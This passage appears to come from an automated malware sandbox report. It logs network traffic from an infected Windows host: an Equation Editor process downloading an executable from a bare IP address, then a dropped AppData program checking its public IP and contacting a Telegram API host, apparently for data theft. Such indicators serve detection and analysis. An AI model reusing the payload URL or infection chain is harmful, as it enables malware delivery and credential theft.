                                                Sep 26, 2024 09:25:02.189649105 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189660072 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189671040 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189682007 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189691067 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189733982 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189729929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189745903 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189755917 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189766884 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189768076 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189786911 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189801931 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189883947 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.189918995 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.189960957 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190424919 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190435886 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190445900 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190473080 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190485954 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190563917 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190573931 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190586090 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190596104 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190602064 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190608025 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190617085 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190618038 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190634012 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190645933 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190707922 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190716982 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190751076 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190860033 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190871954 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190881968 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190892935 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.190907955 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190918922 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190936089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190999985 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.191040993 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242513895 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242554903 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242568016 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242615938 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242629051 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242645025 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242749929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242764950 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242778063 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242789030 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242799044 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242800951 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242810965 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242820024 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242821932 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242840052 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242841005 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242857933 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242873907 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242939949 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242973089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243016958 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243033886 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243046999 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243052006 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243058920 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243067026 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243083000 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243094921 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243136883 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243148088 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243159056 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243169069 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243172884 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243186951 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243189096 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243199110 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243204117 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243211031 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243220091 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243235111 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243247986 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243375063 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243410110 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243421078 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:38.811044931 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.855915070 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:38.861099958 CEST8049176193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:38.861193895 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:39.009927034 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.009968042 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.010039091 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.043796062 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.043816090 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.662944078 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.663057089 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.099841118 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.099864006 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.100308895 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.307152987 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.337202072 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.383407116 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509454966 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509542942 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509625912 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.873872995 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:26:22.788729906 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:26:22.788949966 CEST4916780192.168.2.22193.122.130.0
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.393940926 CEST8.8.8.8192.168.2.220xfb7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.412592888 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.424607992 CEST8.8.8.8192.168.2.220xe7aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:38.147402048 CEST8.8.8.8192.168.2.220xec33No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:38.147402048 CEST8.8.8.8192.168.2.220xec33No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:39.008960962 CEST8.8.8.8192.168.2.220xc07cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • 66.63.187.123
                                                • checkip.dyndns.org
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.22 | 49163 | 66.63.187.123 | 80 | 3272 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:00.684156895 CEST | 320 | OUT | GET /txt/HgCppsoKmxQq.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 66.63.187.123
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:01.423650026 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.26.2
                                                Date: Thu, 26 Sep 2024 07:25:01 GMT
                                                Content-Type: application/x-msdos-program
                                                Content-Length: 704000
                                                Connection: keep-alive
                                                Last-Modified: Thu, 26 Sep 2024 03:29:52 GMT
                                                ETag: "abe00-622fd59fdddc0"
                                                Accept-Ranges: bytes


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.22 | 49164 | 132.226.247.73 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:06.189268112 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:10.380408049 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bb01a116122b8bc35260dcd552832768
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:10.403357983 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:10.608175039 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c776b5e5ef88820a402a7ab429e8a1b2
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:11.511487007 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:11.716519117 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 05e732c011499b02e161f07b1175c7f5
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.22 | 49167 | 193.122.130.0 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:12.540491104 CEST | 127 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 09:25:17.786223888 CEST | 745 | IN | HTTP/1.1 504 Gateway Time-out
                                                Date: Thu, 26 Sep 2024 07:25:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 557
                                                Connection: keep-alive
                                                X-Request-ID: 650284524c11e72e7ee267930778dcb2
                                                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Sep 26, 2024 09:25:17.999521017 CEST | 745 | IN | HTTP/1.1 504 Gateway Time-out
                                                Date: Thu, 26 Sep 2024 07:25:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 557
                                                Connection: keep-alive
                                                X-Request-ID: 650284524c11e72e7ee267930778dcb2
                                                Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.22 | 49168 | 158.101.44.242 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:17.839169025 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:23.095289946 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 9484ad06c1a99fbd50a3a3b230e94863
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:23.195626020 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 9484ad06c1a99fbd50a3a3b230e94863
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.22 | 49170 | 193.122.6.168 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:23.830612898 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:26.958578110 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:27.497669935 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:28.538409948 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:26 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: e0144237c56e0703b2d41878e3d053cd
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.22 | 49172 | 193.122.130.0 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:28.747968912 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:29.325105906 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f38c427d48e67f08cfe2e83a742d2f2d
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:29.535538912 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: f38c427d48e67f08cfe2e83a742d2f2d
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.22 | 49174 | 132.226.8.169 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:30.070146084 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:31.874126911 CEST | 682 | IN | HTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.22 | 49175 | 132.226.8.169 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:32.059623003 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:35.570316076 CEST | 682 | IN | HTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Sep 26, 2024 09:25:35.779557943 CEST | 682 | IN | HTTP/1.1 502 Bad Gateway
                                                Date: Thu, 26 Sep 2024 07:25:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.22 | 49176 | 193.122.6.168 | 80 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Sep 26, 2024 09:25:36.499825001 CEST | 151 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 09:25:38.126357079 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bff4a0dcab9afbc8f9305928c16fc196
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 09:25:38.331623077 CEST | 320 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bff4a0dcab9afbc8f9305928c16fc196
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


